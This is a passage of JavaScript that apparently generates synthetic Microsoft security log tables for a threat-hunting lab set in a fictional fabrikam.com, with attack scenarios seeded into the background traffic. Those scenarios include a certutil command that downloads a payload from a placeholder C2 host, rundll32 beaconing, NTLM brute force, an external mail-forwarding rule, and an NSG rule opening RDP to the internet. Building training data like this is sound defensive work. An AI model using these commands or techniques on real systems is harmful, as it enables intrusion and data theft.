  /* S3 beacon: FAB-WKS-117 rundll32 → C2_IP:443 every 5 minutes for 19 hours (228 beacons would be a lot; keep 40, every 5 min after chain, then every 30 min) */
  const s3 = LAB_NOW - 20 * H;
  mk(s3 + 26000, "FAB-WKS-117", "akowalski", "ConnectionSuccess", C2_IP, 80, `http://${C2_HOST}/u/svc.dat`, "certutil.exe", "C:\\Windows\\System32", `certutil.exe -urlcache -split -f http://${C2_HOST}/u/svc.dat C:\\Users\\Public\\svc.dat`, "powershell.exe", { lip: "10.11.7.117" });
  for (let i = 0; i < 24; i++) mk(s3 + 65000 + i * 5 * M, "FAB-WKS-117", "akowalski", "ConnectionSuccess", C2_IP, 443, C2_HOST, "rundll32.exe", "C:\\Windows\\System32", "rundll32.exe C:\\Users\\Public\\svc.dat,Start", "powershell.exe", { lip: "10.11.7.117" });
  for (let i = 0; i < 16; i++) mk(s3 + 3 * H + i * 60 * M, "FAB-WKS-117", "system", "ConnectionSuccess", C2_IP, 443, C2_HOST, "rundll32.exe", "C:\\Windows\\System32", "rundll32.exe C:\\Users\\Public\\svc.dat,Start", "svchost.exe", { lip: "10.11.7.117" });
  /* S3 internal recon: SMB to several hosts from 117 */
  for (let i = 0; i < 12; i++) mk(s3 + 100000 + i * 3000, "FAB-WKS-117", "akowalski", i % 4 === 0 ? "ConnectionSuccess" : "ConnectionFailed", `10.11.${int(0, 40)}.${int(2, 250)}`, 445, "", "rundll32.exe", "C:\\Windows\\System32", "rundll32.exe C:\\Users\\Public\\svc.dat,Start", "powershell.exe", { lip: "10.11.7.117" });
  /* inbound RDP accepted on FAB-APP01 from the Internet after S7 */
  for (let i = 0; i < 5; i++) mk(LAB_NOW - 28 * H + i * 11 * M, "FAB-APP01", "system", "InboundConnectionAccepted", KV_IP, 3389, "", "svchost.exe", "C:\\Windows\\System32", "svchost.exe -k termsvcs -s TermService", "services.exe", { lip: "10.10.0.21" });
  table("DeviceNetworkEvents", cols, sortByTime(rows));
}

/* ======================= DeviceLogonEvents (≈260) ======================= */
{
  const cols = [["TimeGenerated", "datetime"], ["Timestamp", "datetime"], ["DeviceId", "string"], ["DeviceName", "string"], ["ActionType", "string"], ["LogonType", "string"], ["AccountDomain", "string"], ["AccountName", "string"], ["AccountSid", "string"], ["Protocol", "string"], ["FailureReason", "string"], ["IsLocalAdmin", "bool"], ["LogonId", "long"], ["RemoteDeviceName", "string"], ["RemoteIP", "string"], ["RemoteIPType", "string"], ["RemotePort", "int"], ["InitiatingProcessFileName", "string"], ["InitiatingProcessAccountName", "string"], ["ReportId", "long"], ["AdditionalFields", "string"]];
  const rows = []; let rid = 300000;
  const mk = (t, host, act, lt, u, o = {}) => rows.push([dt(t), dt(t), devId[host], `${host.toLowerCase()}.fabrikam.com`, act, lt, o.dom || "fabrikam", u, `S-1-5-21-1004336348-1177238915-682003330-${int(1100, 1300)}`, o.proto || (lt === "Interactive" || lt === "Unlock" ? "Negotiate" : chance(.8) ? "Kerberos" : "NTLM"), o.reason || "", o.admin ?? ["adm-dnguyen", "pmurphy", "svc-backup"].includes(u), int(100000, 9999999), o.rdev || "", o.rip || "", o.rip ? (o.rip.startsWith("10.") ? "Private" : "Public") : "", o.rport ?? null, o.proc || (lt === "Network" ? "" : "winlogon.exe"), o.proc ? "system" : "system", rid++, JSON.stringify({ IsLocalLogon: lt !== "Network" && lt !== "RemoteInteractive" })]);
  for (let i = 0; i < 200; i++) { const host = pick(HOSTS); const u = userOfHost[host] || pick(["adm-dnguyen", "pmurphy", "svc-backup"]); const lt = pick(["Interactive", "Interactive", "Unlock", "Network", "Network", "RemoteInteractive", "Batch"]); const ok = chance(.94); mk(tAgo(0, 168), host, ok ? "LogonSuccess" : "LogonFailed", lt, u, { reason: ok ? "" : pick(["InvalidUserNameOrPassword", "InvalidUserNameOrPassword", "AccountLockedOut"]), rip: lt === "Network" || lt === "RemoteInteractive" ? CORP_IP() : "", rdev: lt === "Network" ? pick(WKS) : "" }); }
  /* S4 brute force on FAB-DC01 (NTLM, Network) from SCAN_IP, mirrors SecurityEvent */
  const bf = LAB_NOW - 52 * H;
  for (let i = 0; i < 45; i++) mk(bf + i * 8000, "FAB-DC01", "LogonFailed", "Network", USERS[i % 20][0], { proto: "NTLM", reason: i % 9 === 4 ? "NoSuchUser" : "InvalidUserNameOrPassword", rip: SCAN_IP, rdev: "KALI", rport: int(40000, 60000), admin: false });
  mk(bf + 12 * M, "FAB-DC01", "LogonSuccess", "Network", "svc-backup", { proto: "NTLM", rip: SCAN_IP, rdev: "KALI", rport: 51844, admin: true });
  mk(bf + 14 * M, "FAB-DC01", "LogonSuccess", "RemoteInteractive", "svc-backup", { proto: "NTLM", rip: SCAN_IP, rdev: "KALI", rport: 51902, admin: true });
  /* S3 lateral attempts from 117 to FAB-FS01 */
  const s3 = LAB_NOW - 20 * H;
  for (let i = 0; i < 6; i++) mk(s3 + 110000 + i * 4000, "FAB-FS01", i < 5 ? "LogonFailed" : "LogonSuccess", "Network", i < 5 ? "administrator" : "akowalski", { proto: "NTLM", reason: i < 5 ? "InvalidUserNameOrPassword" : "", rip: "10.11.7.117", rdev: "FAB-WKS-117", rport: int(40000, 60000), admin: false, dom: i < 5 ? "FAB-FS01" : "fabrikam" });
  /* S7 RDP into FAB-APP01 from KV_IP */
  mk(LAB_NOW - 28 * H + 12 * M, "FAB-APP01", "LogonSuccess", "RemoteInteractive", "svc-automation", { proto: "NTLM", rip: KV_IP, rdev: "DESKTOP-9K2L0PQ", rport: 50211, admin: true });
  table("DeviceLogonEvents", cols, sortByTime(rows));
}

/* ======================= EmailEvents (≈280) ======================= */
{
  const cols = [["TimeGenerated", "datetime"], ["Timestamp", "datetime"], ["NetworkMessageId", "string"], ["InternetMessageId", "string"], ["SenderMailFromAddress", "string"], ["SenderFromAddress", "string"], ["SenderDisplayName", "string"], ["SenderFromDomain", "string"], ["SenderMailFromDomain", "string"], ["SenderIPv4", "string"], ["RecipientEmailAddress", "string"], ["RecipientObjectId", "string"], ["Subject", "string"], ["EmailClusterId", "long"], ["EmailDirection", "string"], ["DeliveryAction", "string"], ["DeliveryLocation", "string"], ["ThreatTypes", "string"], ["ThreatNames", "string"], ["DetectionMethods", "string"], ["ConfidenceLevel", "string"], ["AttachmentCount", "int"], ["UrlCount", "int"], ["AuthenticationDetails", "string"], ["Connectors", "string"], ["OrgLevelAction", "string"], ["OrgLevelPolicy", "string"], ["UserLevelAction", "string"], ["UserLevelPolicy", "string"], ["ReportId", "string"], ["AdditionalFields", "string"]];
  const rows = [];
  const mk = (t, from, fromName, fromDom, sip, to, subject, dir, act, loc, threats, names, det, att, url, auth, o = {}) => rows.push([dt(t), dt(t), guid(), `<${hex(24)}@${fromDom}>`, from, from, fromName, fromDom, fromDom, sip, upn(to), userId[to] || guid(), subject, o.cluster ?? int(100000, 999999), dir, act, loc, threats, names, det, o.conf || "", att, url, auth, "", o.orgAct || "", o.orgPol || "", "", "", guid(), "{}"]);
  const EXT = [["newsletter@contoso-news.example", "Contoso Weekly", "contoso-news.example", "40.92.21.10"], ["no-reply@litware-support.example", "Litware Support", "litware-support.example", "52.101.56.9"], ["orders@woodgrove-bank.example", "Woodgrove Bank", "woodgrove-bank.example", "198.51.100.200"], ["hr@tailspintoys.example", "Tailspin Toys HR", "tailspintoys.example", "40.107.74.80"], ["alerts@github.com", "GitHub", "github.com", "192.30.252.206"]];
  const SUBJ = ["Weekly digest", "Your order has shipped", "Meeting notes", "Re: Q4 budget", "Action required: expense report", "Welcome to the team", "[GitHub] A new SSH key was added", "Invoice 10422 attached", "Lunch?", "FW: Project timeline"];
  for (let i = 0; i < 170; i++) { const to = USERS[int(0, 24)][0]; const internal = chance(.4); const e = internal ? [upn(USERS[int(0, 24)][0]), "", "fabrikam.com", "10.11.0.9"] : pick(EXT); const spam = !internal && chance(.08); mk(tAgo(0, 168), e[0], e[1] || USERS.find(x => upn(x[0]) === e[0])?.[1] || "", e[2], e[3], to, pick(SUBJ), internal ? "Intra-org" : "Inbound", spam ? "Junked" : "Delivered", spam ? "Junk folder" : "Inbox/folder", spam ? "Spam" : "", "", spam ? '["Spam: General filter"]' : "", chance(.3) ? 1 : 0, int(0, 4), internal ? "" : '["SPF=pass","DKIM=pass","DMARC=pass","CompAuth=pass"]'); }
  for (let i = 0; i < 40; i++) { const from = USERS[int(0, 24)][0]; mk(tAgo(0, 168), upn(from), USERS.find(x => x[0] === from)[1], "fabrikam.com", "10.11.0.9", pick(["partner@contoso-news.example", "vendor@litware-support.example"]).split("@")[0], pick(SUBJ), "Outbound", "Delivered", "External", "", "", "", chance(.5) ? 1 : 0, int(0, 2), ""); }
  /* S5 phishing wave: 30 recipients, 44h ago, "Invoice overdue - action required", from billing@northwind-pay.example, SPF fail; 22 Delivered Inbox, 5 Junked, 3 Quarantined (ZAP later) */
  const ph = LAB_NOW - 44 * H;
  USERS.slice(0, 30).forEach(([u], i) => { const r = i < 22 ? ["Delivered", "Inbox/folder", "Phish", "Credential phishing", '["URL detonation reputation","Spoof DMARC"]'] : i < 27 ? ["Junked", "Junk folder", "Phish", "Credential phishing", '["URL detonation reputation"]'] : ["Blocked", "Quarantine", "Phish", "Credential phishing", '["Impersonation brand","URL detonation"]']; mk(ph + i * 1500, "billing@northwind-pay.example", "Northwind Accounts Payable", "northwind-pay.example", "185.220.101.34", u, "Invoice overdue - action required", "Inbound", r[0], r[1], r[2], r[3], r[4], 0, 1, '["SPF=fail","DKIM=none","DMARC=fail","CompAuth=fail"]', { cluster: 884721, conf: '{"Phish":"High"}', orgAct: i >= 27 ? "Quarantine" : i >= 22 ? "MoveToJmf" : "", orgPol: i >= 22 ? "Anti-phishing policy - Standard" : "" }); });
  /* S1: rlopez forwards mail externally after the inbox rule (Outbound to a gmail-like address) */
  for (let i = 0; i < 9; i++) mk(LAB_NOW - 39 * H + i * 40 * M, upn("rlopez"), "Rosa Lopez", "fabrikam.com", "10.11.0.9", "r.lopez.payments", pick(["FW: Vendor payment schedule", "FW: Wire instructions - Litware", "FW: Q4 AP aging report", "FW: Bank account change request"]), "Outbound", "Delivered", "External", "", "", "", 1, 0, "");
  table("EmailEvents", cols, sortByTime(rows));
}

/* ======================= OfficeActivity (≈320) ======================= */
{
  const cols = [["TimeGenerated", "datetime"], ["OfficeWorkload", "string"], ["RecordType", "string"], ["Operation", "string"], ["OrganizationId", "string"], ["UserType", "string"], ["UserKey", "string"], ["UserId", "string"], ["ClientIP", "string"], ["OfficeObjectId", "string"], ["SourceFileName", "string"], ["SourceFileExtension", "string"], ["SourceRelativeUrl", "string"], ["Site_Url", "string"], ["ResultStatus", "string"], ["Parameters", "string"], ["ExternalAccess", "bool"], ["ClientInfoString", "string"], ["Logon_Type", "string"], ["MailboxOwnerUPN", "string"], ["ItemType", "string"], ["EventSource", "string"], ["UserAgent", "string"], ["OfficeId", "string"]];
  const rows = []; const ORG = guid();
  const FILES = ["Q4-forecast.xlsx", "Board-deck-Nov.pptx", "Vendor-contracts.docx", "Payroll-2026-10.xlsx", "Customer-list.csv", "Roadmap.pptx", "Expense-policy.pdf", "AP-aging.xlsx", "Org-chart.vsdx", "Pricing-model.xlsx"];
  const mk = (t, wl, rt, op, u, ip, o = {}) => rows.push([dt(t), wl, rt, op, ORG, o.utype || "Regular", upn(u), upn(u), ip, o.obj || "", o.file || "", o.file ? o.file.split(".").pop() : "", o.rel || "", o.site || "", o.res || "Succeeded", o.params || "", o.ext ?? false, o.client || "", wl === "Exchange" ? "Owner" : "", wl === "Exchange" ? upn(u) : "", o.item || "", wl === "SharePoint" || wl === "OneDrive" ? "SharePoint" : "", o.ua || "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Edge/130.0.0", guid()]);
  for (let i = 0; i < 210; i++) { const u = USERS[int(0, 24)][0]; const kind = R(); const f = pick(FILES); if (kind < .45) mk(tAgo(0, 168), "SharePoint", "SharePointFileOperation", pick(["FileAccessed", "FileAccessed", "FileModified", "FileDownloaded", "FileUploaded", "FileCheckedIn"]), u, CORP_IP(), { file: f, rel: `Shared Documents/${USERS.find(x => x[0] === u)[2]}`, site: "https://fabrikam.sharepoint.com/sites/" + USERS.find(x => x[0] === u)[2], obj: `https://fabrikam.sharepoint.com/sites/${USERS.find(x => x[0] === u)[2]}/Shared Documents/${f}`, item: "File" }); else if (kind < .7) mk(tAgo(0, 168), "OneDrive", "OneDriveFileOperation", pick(["FileAccessed", "FileSyncUploadedFull", "FileModified"]), u, CORP_IP(), { file: f, rel: "Documents", site: `https://fabrikam-my.sharepoint.com/personal/${u}_fabrikam_com`, item: "File" }); else if (kind < .9) mk(tAgo(0, 168), "Exchange", "ExchangeItem", pick(["MailItemsAccessed", "MailItemsAccessed", "Send", "Update", "MoveToDeletedItems", "SoftDelete"]), u, CORP_IP(), { client: "Client=OWA;Action=ViaProxy", params: '[{"Name":"Identity","Value":"' + upn(u) + '"}]' }); else mk(tAgo(0, 168), "MicrosoftTeams", "MicrosoftTeams", pick(["TeamsSessionStarted", "MessageSent", "MemberAdded"]), u, CORP_IP()); }
  for (let i = 0; i < 10; i++) mk(tAgo(0, 168), "AzureActiveDirectory", "AzureActiveDirectoryStsLogon", "UserLoggedIn", USERS[int(0, 24)][0], pick(PUB_IPS), { obj: "Unknown", ua: "Mozilla/5.0" });
  /* S1 rlopez: New-InboxRule forwarding externally + Set-Mailbox + MailItemsAccessed from SPRAY_IP, ~40h ago */
  const s1 = LAB_NOW - 40 * H;
  mk(s1, "Exchange", "ExchangeAdmin", "New-InboxRule", "rlopez", SPRAY_IP, { res: "True", client: "Client=OWA;Action=ViaProxy", params: '[{"Name":"Name","Value":"."},{"Name":"ForwardTo","Value":"r.lopez.payments@mail.example"},{"Name":"DeleteMessage","Value":"True"},{"Name":"SubjectContainsWords","Value":"invoice;payment;wire"},{"Name":"MarkAsRead","Value":"True"}]', ext: false });
  mk(s1 + 2 * M, "Exchange", "ExchangeAdmin", "Set-Mailbox", "rlopez", SPRAY_IP, { res: "True", params: '[{"Name":"Identity","Value":"rlopez"},{"Name":"ForwardingSmtpAddress","Value":"smtp:r.lopez.payments@mail.example"},{"Name":"DeliverToMailboxAndForward","Value":"True"}]' });
  for (let i = 0; i < 14; i++) mk(s1 + 5 * M + i * 3 * M, "Exchange", "ExchangeItemAggregated", "MailItemsAccessed", "rlopez", SPRAY_IP, { client: "Client=OWA;Action=ViaProxy", params: '[{"Name":"MailAccessType","Value":"Bind"}]', item: "Message" });
  mk(s1 + 50 * M, "Exchange", "ExchangeAdmin", "Add-MailboxPermission", "rlopez", SPRAY_IP, { res: "True", params: '[{"Name":"Identity","Value":"cmoreau"},{"Name":"User","Value":"rlopez"},{"Name":"AccessRights","Value":"FullAccess"}]' });
  /* S6 jpatel mass download: AnonymousLinkCreated then 60 FileDownloaded in 10 min from Lagos IP? no — from a home IP, 15h ago */
  const s6 = LAB_NOW - 15 * H; const HOME = "73.44.182.90";
  mk(s6 - 3 * M, "SharePoint", "SharePointSharingOperation", "AnonymousLinkCreated", "jpatel", HOME, { file: "Customer-list.csv", rel: "Shared Documents/Engineering", site: "https://fabrikam.sharepoint.com/sites/Engineering", obj: "https://fabrikam.sharepoint.com/sites/Engineering/Shared Documents/Customer-list.csv", item: "File" });
  for (let i = 0; i < 60; i++) mk(s6 + i * 10000, "SharePoint", "SharePointFileOperation", "FileDownloaded", "jpatel", HOME, { file: `design-${String(i + 1).padStart(3, "0")}.${pick(["pdf", "dwg", "docx", "xlsx"])}`, rel: "Shared Documents/Engineering/Designs", site: "https://fabrikam.sharepoint.com/sites/Engineering", obj: `https://fabrikam.sharepoint.com/sites/Engineering/Shared Documents/Engineering/Designs/design-${String(i + 1).padStart(3, "0")}`, item: "File", ua: "OneDriveMpc-Transform_Zip/1.0" });
  /* S2 mchen from Lagos touches SharePoint */
  for (let i = 0; i < 4; i++) mk(LAB_NOW - 26 * H + 22 * M + i * M, "SharePoint", "SharePointFileOperation", "FileAccessed", "mchen", LAGOS_IP, { file: pick(FILES), rel: "Shared Documents/Sales", site: "https://fabrikam.sharepoint.com/sites/Sales", item: "File" });
  table("OfficeActivity", cols, sortByTime(rows));
}

/* ======================= CommonSecurityLog (≈420) ======================= */
{
  const cols = [["TimeGenerated", "datetime"], ["DeviceVendor", "string"], ["DeviceProduct", "string"], ["DeviceVersion", "string"], ["DeviceEventClassID", "string"], ["Activity", "string"], ["LogSeverity", "string"], ["SourceIP", "string"], ["SourcePort", "int"], ["DestinationIP", "string"], ["DestinationPort", "int"], ["Protocol", "string"], ["DeviceAction", "string"], ["ApplicationProtocol", "string"], ["RequestURL", "string"], ["DeviceInboundInterface", "string"], ["DeviceOutboundInterface", "string"], ["SentBytes", "long"], ["ReceivedBytes", "long"], ["DestinationHostName", "string"], ["SourceUserName", "string"], ["Message", "string"], ["Computer", "string"], ["DeviceCustomString1", "string"], ["DeviceCustomNumber1", "long"], ["Type", "string"]];
  const rows = [];
  const PA = ["Palo Alto Networks", "PAN-OS", "11.1.2"], FG = ["Fortinet", "Fortigate", "v7.4.4"];
  const mk = (t, v, cls, act, sev, sip, sport, dip, dport, proto, action, app, url, o = {}) => rows.push([dt(t), v[0], v[1], v[2], cls, act, sev, sip, sport, dip, dport, proto, action, app, url, o.inIf || "ethernet1/2", o.outIf || "ethernet1/1", o.sent ?? int(200, 90000), o.recv ?? int(200, 900000), o.host || "", o.user || "", o.msg || "", "fab-fwd-01", o.cs1 || "", o.cn1 ?? null, "CommonSecurityLog"]);
  const WEB = [["151.101.1.69", 443, "www.reddit.com"], ["104.18.32.47", 443, "cdn.jsdelivr.net"], ["142.250.80.46", 443, "www.google.com"], ["13.107.42.14", 443, "fabrikam.sharepoint.com"], ["52.96.165.242", 443, "outlook.office365.com"], ["23.185.0.4", 443, "www.wikipedia.org"], ["185.199.108.153", 443, "github.io"], ["172.217.14.206", 80, "detectportal.firefox.com"]];
  for (let i = 0; i < 300; i++) { const w = pick(WEB); const u = USERS[int(0, 24)][0]; const deny = chance(.08); mk(tAgo(0, 168), PA, deny ? "DENY" : "TRAFFIC", deny ? "deny" : "end", deny ? "5" : "3", CORP_IP(), int(49152, 65535), w[0], w[1], "TCP", deny ? "deny" : "allow", w[1] === 443 ? "ssl" : "web-browsing", w[1] === 80 ? `http://${w[2]}/` : "", { host: w[2], user: `fabrikam\\${u}`, cs1: deny ? "block-social-media" : "allow-web" }); }
  for (let i = 0; i < 40; i++) mk(tAgo(0, 168), FG, "0000000013", "forward", "4", `10.12.${int(0, 40)}.${int(2, 250)}`, int(49152, 65535), pick(["10.10.0.5", "10.10.0.21", "10.10.0.30"]), pick([445, 1433, 3389, 22]), "TCP", "deny", pick(["SMB", "MSSQL", "RDP", "SSH"]), "", { inIf: "port2", outIf: "port1", msg: "policy violation", cs1: "deny-lateral" });
  /* S8 port scan from SCAN_IP: 50 destination ports on FAB-WEB01 public IP in 2 minutes, 54h ago (before brute force) */
  const scan = LAB_NOW - 54 * H;
  [21, 22, 23, 25, 53, 80, 88, 110, 111, 135, 139, 143, 389, 443, 445, 464, 465, 587, 593, 636, 993, 995, 1433, 1521, 2049, 3268, 3306, 3389, 5432, 5900, 5985, 5986, 6379, 8000, 8080, 8443, 8888, 9200, 27017, 47001].forEach((port, i) => mk(scan + i * 2900, PA, "DENY", "deny", "5", SCAN_IP, 40000 + i, "198.51.100.10", port, "TCP", "deny", "not-applicable", "", { inIf: "ethernet1/1", outIf: "ethernet1/2", sent: 60, recv: 0, host: "", cs1: "inbound-default-deny" }));
  [3389, 445, 5985].forEach((port, i) => mk(scan + 3 * M + i * 1000, PA, "TRAFFIC", "end", "3", SCAN_IP, 41000 + i, "198.51.100.10", port, "TCP", "allow", port === 3389 ? "ms-rdp" : port === 445 ? "ms-ds-smb" : "ms-wmi", "", { inIf: "ethernet1/1", outIf: "ethernet1/2", cs1: "allow-mgmt-legacy" }));
  /* S3 beacons also visible at the perimeter: FAB-WKS-117 (10.11.7.117) → C2_IP:443 every 5 min, allowed */
  const s3 = LAB_NOW - 20 * H;
  for (let i = 0; i < 24; i++) mk(s3 + 65000 + i * 5 * M, PA, "TRAFFIC", "end", "3", "10.11.7.117", int(49152, 65535), C2_IP, 443, "TCP", "allow", "ssl", "", { host: C2_HOST, user: "fabrikam\\akowalski", sent: 1200 + int(0, 40), recv: 380 + int(0, 20), cs1: "allow-web" });
  mk(s3 + 26000, PA, "THREAT", "url", "4", "10.11.7.117", 52110, C2_IP, 80, "TCP", "alert", "web-browsing", `http://${C2_HOST}/u/svc.dat`, { host: C2_HOST, user: "fabrikam\\akowalski", msg: "URL filtering: malware category", cs1: "url-filter" });
  table("CommonSecurityLog", cols, sortByTime(rows));
}

/* ======================= AzureActivity (≈220) ======================= */
{
  const cols = [["TimeGenerated", "datetime"], ["OperationName", "string"], ["OperationNameValue", "string"], ["ResourceGroup", "string"], ["SubscriptionId", "string"], ["Caller", "string"], ["CallerIpAddress", "string"], ["ActivityStatusValue", "string"], ["ActivitySubstatusValue", "string"], ["Category", "string"], ["Level", "string"], ["ResourceProviderValue", "string"], ["Resource", "string"], ["_ResourceId", "string"], ["CorrelationId", "string"], ["Properties", "string"], ["Authorization_d", "dynamic"], ["Claims_d", "dynamic"], ["HTTPRequest", "string"], ["EventSubmissionTimestamp", "datetime"], ["Hierarchy", "string"]];
  const rows = []; const SUB1 = guid(), SUB2 = guid();
  const OPS = [["Create or Update Virtual Machine", "MICROSOFT.COMPUTE/VIRTUALMACHINES/WRITE", "MICROSOFT.COMPUTE", "RG-Prod", "vm-app-0"], ["Start Virtual Machine", "MICROSOFT.COMPUTE/VIRTUALMACHINES/START/ACTION", "MICROSOFT.COMPUTE", "RG-Prod", "vm-app-0"], ["Deallocate Virtual Machine", "MICROSOFT.COMPUTE/VIRTUALMACHINES/DEALLOCATE/ACTION", "MICROSOFT.COMPUTE", "RG-Dev", "vm-dev-0"], ["Create or Update Storage Account", "MICROSOFT.STORAGE/STORAGEACCOUNTS/WRITE", "MICROSOFT.STORAGE", "RG-Prod", "stfabprod01"], ["List Storage Account Keys", "MICROSOFT.STORAGE/STORAGEACCOUNTS/LISTKEYS/ACTION", "MICROSOFT.STORAGE", "RG-Prod", "stfabprod01"], ["Create role assignment", "MICROSOFT.AUTHORIZATION/ROLEASSIGNMENTS/WRITE", "MICROSOFT.AUTHORIZATION", "RG-Sentinel", "rg-sentinel"], ["Update Scheduled Alert Rule", "MICROSOFT.SECURITYINSIGHTS/ALERTRULES/WRITE", "MICROSOFT.SECURITYINSIGHTS", "RG-Sentinel", "fab-sentinel-prod"], ["Create or Update Network Security Group", "MICROSOFT.NETWORK/NETWORKSECURITYGROUPS/WRITE", "MICROSOFT.NETWORK", "RG-Prod", "nsg-app"], ["Create or Update Security Rule", "MICROSOFT.NETWORK/NETWORKSECURITYGROUPS/SECURITYRULES/WRITE", "MICROSOFT.NETWORK", "RG-Prod", "nsg-app"], ["Update Key Vault", "MICROSOFT.KEYVAULT/VAULTS/WRITE", "MICROSOFT.KEYVAULT", "RG-Prod", "kv-fab-prod"], ["Create Deployment", "MICROSOFT.RESOURCES/DEPLOYMENTS/WRITE", "MICROSOFT.RESOURCES", "RG-Dev", "deploy-" ], ["Delete Virtual Machine", "MICROSOFT.COMPUTE/VIRTUALMACHINES/DELETE", "MICROSOFT.COMPUTE", "RG-Dev", "vm-dev-1"], ["Write Diagnostic Setting", "MICROSOFT.INSIGHTS/DIAGNOSTICSETTINGS/WRITE", "MICROSOFT.INSIGHTS", "RG-Prod", "vm-app-0"], ["Microsoft.Security/locations/alerts/activate/action", "MICROSOFT.SECURITY/LOCATIONS/ALERTS/ACTIVATE/ACTION", "MICROSOFT.SECURITY", "RG-Prod", "vm-app-0"]];
  const ADMINS = ["adm-dnguyen", "pmurphy", "svc-automation", "fdiaz"];
  const mk = (t, op, caller, ip, status, o = {}) => { const sub = op[3] === "RG-Dev" ? SUB2 : SUB1; const rid = `/subscriptions/${sub}/resourceGroups/${op[3]}/providers/${op[2].toLowerCase().replace("microsoft.", "Microsoft.")}/${op[1].split("/")[1].toLowerCase()}/${op[4]}`; rows.push([dt(t), op[0], op[1], op[3].toUpperCase(), sub, caller.includes("@") ? caller : upn(caller), ip, status, status === "Failure" ? "Forbidden" : status === "Success" ? "OK" : status === "Accept" ? "Created" : "", o.cat || "Administrative", status === "Failure" ? "Error" : "Informational", op[2], op[4], rid, guid(), o.props || JSON.stringify({ statusCode: status === "Failure" ? "Forbidden" : "OK", serviceRequestId: guid(), eventCategory: "Administrative", entity: rid, message: op[1], hierarchy: "fabrikam" }), { action: op[1], scope: rid, evidence: { role: o.role || "Contributor", roleAssignmentScope: `/subscriptions/${sub}`, principalType: caller.startsWith("svc") ? "ServicePrincipal" : "User" } }, { "http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name": caller.includes("@") ? caller : upn(caller), ipaddr: ip, "http://schemas.microsoft.com/claims/authnmethodsreferences": caller.startsWith("svc") ? "pwd" : "pwd,mfa" }, o.http || JSON.stringify({ clientIpAddress: ip, method: op[1].endsWith("DELETE") ? "DELETE" : op[1].endsWith("WRITE") ? "PUT" : "POST" }), dt(t + 2000), "fabrikam"]); };
  for (let i = 0; i < 190; i++) { const op = pick(OPS); const caller = pick(ADMINS); const t = tAgo(0, 168); const fail = chance(.06); mk(t, op, caller, chance(.8) ? CORP_IP() : pick(PUB_IPS), "Start"); mk(t + 1500, op, caller, chance(.8) ? CORP_IP() : pick(PUB_IPS), fail ? "Failure" : chance(.3) ? "Accept" : "Success", { cat: op[0].startsWith("Microsoft.Security") ? "Security" : "Administrative" }); }
  /* S7: svc-automation from KV_IP opens 3389 from Internet on nsg-app, then Key Vault access policy change, then listkeys, 29h ago */
  const s7 = LAB_NOW - 29 * H;
  mk(s7, OPS[8], "svc-automation", KV_IP, "Start"); mk(s7 + 2000, OPS[8], "svc-automation", KV_IP, "Success", { props: JSON.stringify({ statusCode: "OK", responseBody: { properties: { protocol: "Tcp", sourceAddressPrefix: "*", destinationPortRange: "3389", access: "Allow", direction: "Inbound", priority: 100 }, name: "AllowRDP-Any" }, eventCategory: "Administrative" }) });
  mk(s7 + 6 * M, OPS[9], "svc-automation", KV_IP, "Start"); mk(s7 + 6 * M + 2000, OPS[9], "svc-automation", KV_IP, "Success", { props: JSON.stringify({ statusCode: "OK", responseBody: { properties: { accessPolicies: [{ objectId: guid(), permissions: { secrets: ["get", "list"], keys: ["get", "list", "backup"] } }], enablePurgeProtection: false } }, eventCategory: "Administrative" }) });
  mk(s7 + 9 * M, OPS[4], "svc-automation", KV_IP, "Start"); mk(s7 + 9 * M + 1200, OPS[4], "svc-automation", KV_IP, "Success");
  mk(s7 + 11 * M, OPS[5], "svc-automation", KV_IP, "Start"); mk(s7 + 11 * M + 1800, OPS[5], "svc-automation", KV_IP, "Success", { role: "Owner" });
  /* Sentinel alert rule disabled by adm-dnguyen (noise with a twist) */
  mk(LAB_NOW - 70 * H, OPS[6], "adm-dnguyen", CORP_IP(), "Success", { props: JSON.stringify({ statusCode: "OK", responseBody: { properties: { displayName: "Password spray - multiple accounts from one IP", enabled: false } } }) });
  table("AzureActivity", cols, sortByTime(rows));
}

/* ======================= IdentityLogonEvents (≈260) ======================= */
{
  const cols = [["TimeGenerated", "datetime"], ["Timestamp", "datetime"], ["ActionType", "string"], ["Application", "string"], ["LogonType", "string"], ["Protocol", "string"], ["FailureReason", "string"], ["AccountName", "string"], ["AccountDomain", "string"], ["AccountUpn", "string"], ["AccountSid", "string"], ["AccountObjectId", "string"], ["AccountDisplayName", "string"], ["DeviceName", "string"], ["DeviceType", "string"], ["OSPlatform", "string"], ["IPAddress", "string"], ["Port", "int"], ["DestinationDeviceName", "string"], ["DestinationIPAddress", "string"], ["DestinationPort", "int"], ["TargetDeviceName", "string"], ["TargetAccountDisplayName", "string"], ["Location", "string"], ["ISP", "string"], ["ReportId", "string"], ["AdditionalFields", "string"]];
  const rows = [];
  const mk = (t, act, lt, proto, reason, u, dev, ip, dst, o = {}) => { const U = USERS.find(x => x[0] === u); rows.push([dt(t), dt(t), act, o.app || "Active Directory", lt, proto, reason, u, "fabrikam.com", upn(u), `S-1-5-21-1004336348-1177238915-682003330-${int(1100, 1300)}`, userId[u] || guid(), U ? U[1] : u, dev, o.dtype || "Workstation", o.os || "Windows10", ip, int(49152, 65535), dst, dst === "FAB-DC01" ? "10.10.0.4" : "10.10.0.5", proto === "Kerberos" ? 88 : proto === "NTLM" ? 445 : 389, dst, "", o.loc || "", o.isp || "", guid(), JSON.stringify({ ActorType: "User", ToDevice: dst, Count: 1 })]); };
  for (let i = 0; i < 230; i++) { const dev = pick(WKS); const u = userOfHost[dev]; const proto = chance(.85) ? "Kerberos" : "NTLM"; const ok = chance(.95); mk(tAgo(0, 168), ok ? "LogonSuccess" : "LogonFailed", pick(["Interactive", "Network", "Network", "RemoteInteractive"]), proto, ok ? "" : pick(["WrongPassword", "WrongPassword", "AccountLocked", "AccountDisabled"]), u, dev, `10.11.${int(0, 40)}.${int(2, 250)}`, pick(["FAB-DC01", "FAB-DC02"])); }
  /* S4 mirror from the DfI sensor on the DC: NTLM failures from KALI (SCAN_IP) */
  const bf = LAB_NOW - 52 * H;
  for (let i = 0; i < 30; i++) mk(bf + i * 12000, "LogonFailed", "Network", "NTLM", i % 9 === 4 ? "UnknownUser" : "WrongPassword", USERS[i % 20][0], "KALI", SCAN_IP, "FAB-DC01", { dtype: "", os: "" });
  mk(bf + 12 * M, "LogonSuccess", "Network", "NTLM", "", "svc-backup", "KALI", SCAN_IP, "FAB-DC01", { dtype: "", os: "" });
  /* S3: akowalski's host asks the DC for lots of service tickets (kerberoasting-ish) */
  const s3 = LAB_NOW - 20 * H;
